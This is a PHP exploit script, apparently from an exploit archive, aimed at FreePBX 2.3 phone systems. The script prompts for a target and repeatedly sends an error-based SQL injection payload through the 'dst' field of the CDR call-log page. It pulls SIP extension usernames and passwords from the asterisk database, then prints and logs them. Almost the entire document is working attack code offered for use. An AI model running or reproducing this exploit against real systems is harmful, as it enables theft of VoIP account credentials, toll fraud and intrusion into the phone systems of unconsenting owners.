FreePBX , Extension Dump Exploit

1. <?
2. /*
3. + Application : FreePBX => 2.3
4. | By Faris , AKA i-Hmx
5. | n0p1337@gmail.com
6. + sec4ever.com , 1337s.cc
7. */
8. print "\r\n";
9. print "+-------------------------------------------+\n";
10. print "|              FreePBX => 2.3               |\n";
11. print "|      Extenstion Dumping Exploitation      |\n";
12. print "|                  By i-Hmx                 |\n";
13. print "|             n0p1337@gmail.com             |\n";
14. print "+-------------------------------------------+\n";
15. echo "| Enter Targer < https://ip > # ";
16. $ip=trim(fgets(STDIN));
17. $host=str_replace("/","",str_replace("http://","",str_replace("https://","",$ip)));
18. $fafile=fopen("$host.log","ab");
19. fwrite($fafile,"[+] FreePBX Extension Dump Result\r\n[+] By i-Hmx\r\n[+] n0p1337@gmail.com\r\n\n");
20. echo "\n\n[+] Attacking $host\n\n";
21. for($f=0;$f<10;$f++)
22. {
23. $uzdata=faget("$ip/admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0","posted=1&current_page=0&Period=Month&fromstatsmonth=2013-02&tostatsmonth=2013-02&fromstatsday_sday=01&fromstatsmonth_sday=2013-02&tostatsday_sday=01&tostatsmonth_sday=2013-02&dst=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+concat%280x666172736177793e3e%2Cid%2C0x3c3c%29+FROM%60asterisk%60.sip+where+%60keyword%60%3D%27account%27+LIMIT+$f"."%2C1%29+%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+%271%27%3D%271&dsttype=1&src=&srctype=1&channel=&duration1=&duration1type=1&duration2=&image16.x=0&image16.y=0&resulttype=min");
24. $user=kastr($uzdata,"farsawy>>","<<");
25. echo "   + Username : $user\n";
26. fwrite($fafile,"   + Username : $user\r\n");
27. $pwdata=faget("$ip//admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0","posted=1&current_page=0&Period=Month&fromstatsmonth=2013-02&tostatsmonth=2013-02&fromstatsday_sday=01&fromstatsmonth_sday=2013-02&tostatsday_sday=01&tostatsmonth_sday=2013-02&dst=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+concat%280x666172736177793e3e%2Cdata%2C0x3c3c%29+FROM%60asterisk%60.sip+where+%60keyword%60%3D%27secret%27+LIMIT+$f"."%2C1%29+%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+%271%27%3D%271&dsttype=1&src=&srctype=1&channel=&duration1=&duration1type=1&duration2=&image16.x=0&image16.y=0&resulttype=min");
28. $pass=kastr($pwdata,"farsawy>>","<<");
29. echo "   + Password : $pass\n\n";
30. fwrite($fafile,"   + Password : $pass\r\n\n");
31. }
32. function faget($url,$post){
33. $curl=curl_init();
34. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
35. curl_setopt($curl,CURLOPT_URL,$url."/admin/cdr/call-comp.php");
36. curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
37. curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
38. curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
39. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
40. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
41. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
42. curl_setopt($curl,CURLOPT_TIMEOUT,5);
43. curl_setopt($curl, CURLOPT_HEADER, false);
44. $exec=curl_exec($curl);
45. curl_close($curl);
46. return $exec;
47. }
48. function kastr($string, $start, $end){
49.                 $string = " ".$string;
50.                 $ini = strpos($string,$start);
51.                 if ($ini == 0) return "";
52.                 $ini += strlen($start);
53.                 $len = strpos($string,$end,$ini) - $ini;
54.                 return substr($string,$ini,$len);
55. }
56. ?>